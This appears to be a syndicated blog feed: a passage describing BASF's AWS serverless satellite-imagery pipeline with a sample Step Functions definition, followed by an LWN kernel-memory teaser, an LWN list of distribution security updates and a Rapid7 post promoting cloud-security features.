  9. Next, the data is published to our internal STAC catalog, which registers the satellite imagery and makes it directly accessible for subsequent processing.
  10. In case of a failed Step Functions execution in Step 5, the Amazon SQS-based failure queue buffers the failed executions. Failure messages contain the error message and the request body. Depending on the error reason, they can be replayed through the replay endpoint of the API Lambda function, which reprocesses them. The endpoint also allows users to filter messages based on their failure type and to delete messages that cannot be replayed.
  11. An update checker, built on AWS Lambda, regularly checks whether a subscription can be updated. It is triggered in conjunction with an event scheduler every 5 minutes, checks the database for subscriptions that can be updated, and sends update request messages to the processing buffer. Besides actively checking resources, such as API endpoints and STAC catalogs, it also sends out an update message if a notification was received, for example, through an external notification service.
  12. Finally, a delete checker, also built on AWS Lambda, identifies subscriptions that can be deleted. It is triggered in conjunction with an event scheduler every 12 hours. It regularly checks the database for subscriptions that can be deleted and removes them from the database, the S3 bucket, and the STAC catalog. As a safety mechanism, a subscription will first be marked for deletion for 6 months before it gets deleted.

Imagery step function

The actual downloading and processing of data from different providers is handled by the imagery function, illustrated for two different providers (Public and Planet) in Figure 3.


Figure 3. Diagram showing detail state machine for the Imagery Step Function

  1. When a request arrives, the provider choice state determines the provider from the request body, depending on which the Step Functions flow routes to different Lambda states.
  2. In case a public provider is selected (for example, Earth Search), the Public_Provider Lambda function downloads the data from STAC-based open data providers and directly uploads it to the S3 data bucket, as shown in Figure 2.
  3. In case Planet data is selected, the data retrieval involves an asynchronous call to an external API: First, the Planet_Requester sends an order to the Planet API, together with a task token for pausing Step Functions and the URL of the Planet_Webhook Lambda function.
  4. The Planet_Webhook function is invoked by Planet when the requested order is available for downloading. Given the transmitted task token, Step Functions is resumed with the next state.
  5. Subsequently, the Planet_Provider Lambda function downloads and processes the Planet data.
  6. For both public providers and Planet, the subsequent Public_Provider Lambda function updates the subscription database entries, as shown in Figure 2 (for example, with the latest available timestamp), and adds the downloaded and processed data to the internal STAC catalog, before it ends in the Success state.
  7. If an error occurs in any of the Lambda functions (2, 3, 5, 6), an error message is prepared in the Error_Parsing state. If an unknown provider is handed in, an error message, including the request body, is prepared in the Error_Provider_Unknown state. In both cases, the error message is pushed to the Failure_Queue (refer to #10 of Figure 2), before it ends in the Failure state.
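As an added illustration (not BASF's own definition), the following Amazon States Language sketch wires up the Figure 3 flow described above, including the task-token pause for Planet and the hand-off to the failure queue from step 10 of Figure 2. Function ARNs, the queue URL, the provider string values, and the Update_Subscription state name are placeholders assumed here.

```json
{
  "Comment": "Added sketch of the Figure 3 state machine; ARNs and the queue URL are placeholders",
  "StartAt": "Provider_Choice",
  "States": {
    "Provider_Choice": {
      "Type": "Choice",
      "Choices": [
        {"Variable": "$.provider", "StringEquals": "public", "Next": "Public_Provider"},
        {"Variable": "$.provider", "StringEquals": "planet", "Next": "Planet_Requester"}
      ],
      "Default": "Error_Provider_Unknown"
    },
    "Public_Provider": {
      "Type": "Task", "Resource": "arn:aws:states:::lambda:invoke",
      "Parameters": {"FunctionName": "PUBLIC_PROVIDER_LAMBDA_ARN", "Payload.$": "$"},
      "ResultPath": "$.download", "Next": "Update_Subscription",
      "Catch": [{"ErrorEquals": ["States.ALL"], "ResultPath": "$.error", "Next": "Error_Parsing"}]
    },
    "Planet_Requester": {
      "Type": "Task", "Resource": "arn:aws:states:::lambda:invoke.waitForTaskToken",
      "Parameters": {"FunctionName": "PLANET_REQUESTER_LAMBDA_ARN",
                     "Payload": {"request.$": "$", "taskToken.$": "$$.Task.Token"}},
      "ResultPath": "$.order", "TimeoutSeconds": 86400, "Next": "Planet_Provider",
      "Catch": [{"ErrorEquals": ["States.ALL"], "ResultPath": "$.error", "Next": "Error_Parsing"}]
    },
    "Planet_Provider": {
      "Type": "Task", "Resource": "arn:aws:states:::lambda:invoke",
      "Parameters": {"FunctionName": "PLANET_PROVIDER_LAMBDA_ARN", "Payload.$": "$"},
      "ResultPath": "$.download", "Next": "Update_Subscription",
      "Catch": [{"ErrorEquals": ["States.ALL"], "ResultPath": "$.error", "Next": "Error_Parsing"}]
    },
    "Update_Subscription": {
      "Type": "Task", "Resource": "arn:aws:states:::lambda:invoke", "Next": "Success",
      "Parameters": {"FunctionName": "SUBSCRIPTION_UPDATE_LAMBDA_ARN", "Payload.$": "$"},
      "Catch": [{"ErrorEquals": ["States.ALL"], "ResultPath": "$.error", "Next": "Error_Parsing"}]
    },
    "Error_Parsing": {"Type": "Pass", "Parameters": {"error.$": "$.error", "request.$": "$"}, "Next": "Failure_Queue"},
    "Error_Provider_Unknown": {"Type": "Pass", "Parameters": {"error": "unknown provider", "request.$": "$"}, "Next": "Failure_Queue"},
    "Failure_Queue": {
      "Type": "Task", "Resource": "arn:aws:states:::sqs:sendMessage",
      "Parameters": {"QueueUrl": "FAILURE_QUEUE_URL", "MessageBody.$": "States.JsonToString($)"},
      "Next": "Failure"
    },
    "Success": {"Type": "Succeed"},
    "Failure": {"Type": "Fail", "Error": "ImageryProcessingFailed"}
  }
}
```

The task token handed to the external provider is a bearer credential that can resume this execution, so the Planet_Webhook function should validate the incoming callback before calling SendTaskSuccess with it, and the TimeoutSeconds on Planet_Requester bounds how long a paused execution can wait for that callback.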

Conclusion

BASF Digital Farming GmbH developed a serverless architecture on AWS for efficiently downloading and supplying satellite imagery for use by its xarvio platform. This architecture led to a 5x faster delivery rate, an 80% cost reduction through on-demand data downloading, and a 3x accelerated development cycle. Future work will include optimizing the architecture, exploring additional AWS services, and onboarding more satellite imagery providers. Similar serverless architectures using AWS services like AWS Step Functions, AWS Lambda, and Amazon API Gateway can enhance flexibility, scalability, and cost efficiency in imagery provisioning. Learn more about AWS serverless offerings at aws.amazon.com/serverless.

[$] Freezing out the page reference count

Post Syndicated from corbet original https://lwn.net/Articles/1000654/

The page structure sits at the core of the kernel’s memory-management subsystem (for now), and a key part of that structure is its reference count, stored in refcount. The page reference count tells the kernel how many users a given page has and when it can be freed. That count is not needed for every page in the system, though. Matthew Wilcox has recently resurrected an old patch set that expands the concept of a “frozen” page — one that lacks a meaningful reference count — to the immediate benefit of the slab allocator but in the service of a longer-term goal as well.

Security updates for Friday

Post Syndicated from daroc original https://lwn.net/Articles/1001164/

Security updates have been issued by AlmaLinux (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, python3:3.6.8, and thunderbird), Debian (clamav), Fedora (pam), Red Hat (firefox, postgresql:13, postgresql:15, python-tornado, redis:7, ruby, ruby:2.5, and ruby:3.1), SUSE (avahi, docker-stable, java-1_8_0-openjdk, libmozjs-128-0, obs-scm-bridge, php8, and teleport), and Ubuntu (ghostscript, needrestart, and shiro).

Rapid7 Extends Cloud Security Capabilities with Updates to Exposure Command

Post Syndicated from Ryan Blanchard original https://blog.rapid7.com/2024/12/06/rapid7-extends-cloud-security-capabilities-with-updates-to-exposure-command/

Rapid7 Extends Cloud Security Capabilities with Updates to Exposure Command

The cloud has become the backbone of modern innovation, powering everything from AI to remote work. But as organizations embrace the cloud, they also face an ever-expanding and increasingly complex attack surface. With purpose-built harvesting technology providing real-time visibility into everything running across multi-cloud environments, Exposure Command from Rapid7 ensures teams have an up-to-date inventory, mapping their cloud attack surface and enriching asset data with risk and business context.

To ensure teams can keep up with the torrid pace of innovation and overcome increased complexity, Rapid7 remains dedicated to investing in advancing the cloud security capabilities available within Exposure Command. To that end, we’ve made a few significant updates across AI resource coverage, third-party CNAPP enrichment and more. Let’s dive right in.

Extending coverage for securing AI/ML development in the cloud

AI and machine learning (ML) are transforming industries, but the speed of adoption can often leave organizations vulnerable. AI/ML workloads often process sensitive or proprietary data, requiring robust protections to ensure compliance with ever-evolving regulations. Safeguarding these environments isn’t just about securing the infrastructure; it’s about understanding the unique workflows and ensuring compliance at every step.

These workloads also introduce unique risks, such as model poisoning attacks or vulnerabilities in APIs, creating new vectors for data exfiltration and service disruption. Additionally, the dynamic nature of cloud-hosted AI services presents challenges in maintaining secure configurations as resources scale elastically, potentially exposing sensitive endpoints or misconfigured setups.

To that end, Exposure Command has expanded support for critical AI services like Amazon Comprehend and Polly, AWS’s natural language processing and text-to-speech services. This provides comprehensive visibility across an organization’s attack surface, aligning AI-specific risks with broader enterprise priorities.

Shifting left and securing the software supply chain

Developers are at the forefront of modern cloud environments, making “shift-left” strategies essential for effective security. By addressing risks during development rather than after deployment, teams can eliminate vulnerabilities before they become costly issues.

Exposure Command now offers more robust Infrastructure-as-Code (IaC) scanning and deeper CI/CD integration, with Terraform and CloudFormation support across hundreds of resource types. For development teams, integrations like GitLab, GitHub Actions, AWS CloudFormation, and Azure DevOps bring security checks directly into their workflows. Whether it’s identifying misconfigurations in AWS Glue Catalogs or assessing risks in SES configurations, these tools help teams secure their code without breaking their stride.

Bridging the hybrid cloud gap with native and third-party CNAPP connectors

For many organizations, the challenge isn’t just securing the cloud – it’s securing everything holistically. Hybrid environments that span on-prem systems and multiple cloud providers can create silos, leading to gaps in visibility and risk management. To tackle this, we’ve integrated InsightCloudSec data directly into Surface Command, empowering security teams with a unified view of their entire attack surface in one place.

But we didn’t stop at consolidating our own native CNAPP capabilities. Teams now get out-of-the-box integrations with popular cloud security tools like Wiz and Orca as well as CSP-native services like AWS Inspector, all making it easier than ever to identify risks across cloud-native and hybrid environments. Everything can now be seen in one place – from endpoint vulnerabilities to cloud misconfigurations and overly permissive roles – allowing for faster action with clarity and precision.

Tackling virtual desktop risks with custom registry keys

With the rise of remote work, virtual desktop infrastructures (VDIs) like AWS Workspaces have become essential. Yet, their dynamic nature makes tracking vulnerabilities a challenge. Exposure Command addresses this with features like custom registry keys for golden images, ensuring you can trace a risk back to its source and effectively prioritize remediation.

Commanding the cloud attack surface

The challenges of securing modern environments aren’t going away. Attack surfaces will continue to expand, threats will grow more sophisticated, and organizations will face increasing pressure to innovate securely.

Keep an eye out for more updates coming soon as we continue to invest in helping organizations effectively manage exposures from endpoint to cloud.